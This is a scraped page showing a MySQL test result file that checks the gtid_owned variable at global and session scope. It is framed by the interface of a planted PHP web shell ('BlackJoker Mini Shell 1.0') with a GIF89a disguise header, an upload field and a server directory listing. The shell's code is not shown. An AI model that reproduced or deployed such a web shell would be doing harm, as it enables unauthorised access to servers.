GIF89a; Mini Shell

Mini Shell

Direktori : /usr/share/mysql-test/suite/sys_vars/r/
Upload File :
Current File : //usr/share/mysql-test/suite/sys_vars/r/gtid_owned_basic.result

SET @start_global_value = @@global.gtid_owned;
SELECT @start_global_value;
@start_global_value

select @@global.gtid_owned;
@@global.gtid_owned

select @@session.gtid_owned;
@@session.gtid_owned

show global variables like 'gtid_owned';
Variable_name	Value
gtid_owned	
show session variables like 'gtid_owned';
Variable_name	Value
gtid_owned	
select * from information_schema.global_variables where variable_name='gtid_owned';
VARIABLE_NAME	VARIABLE_VALUE
GTID_OWNED	
select * from information_schema.session_variables where variable_name='gtid_owned';
VARIABLE_NAME	VARIABLE_VALUE
GTID_OWNED	
select @@global.gtid_owned;
@@global.gtid_owned

select @@session.gtid_owned;
@@session.gtid_owned


./BlackJoker Mini Shell 1.0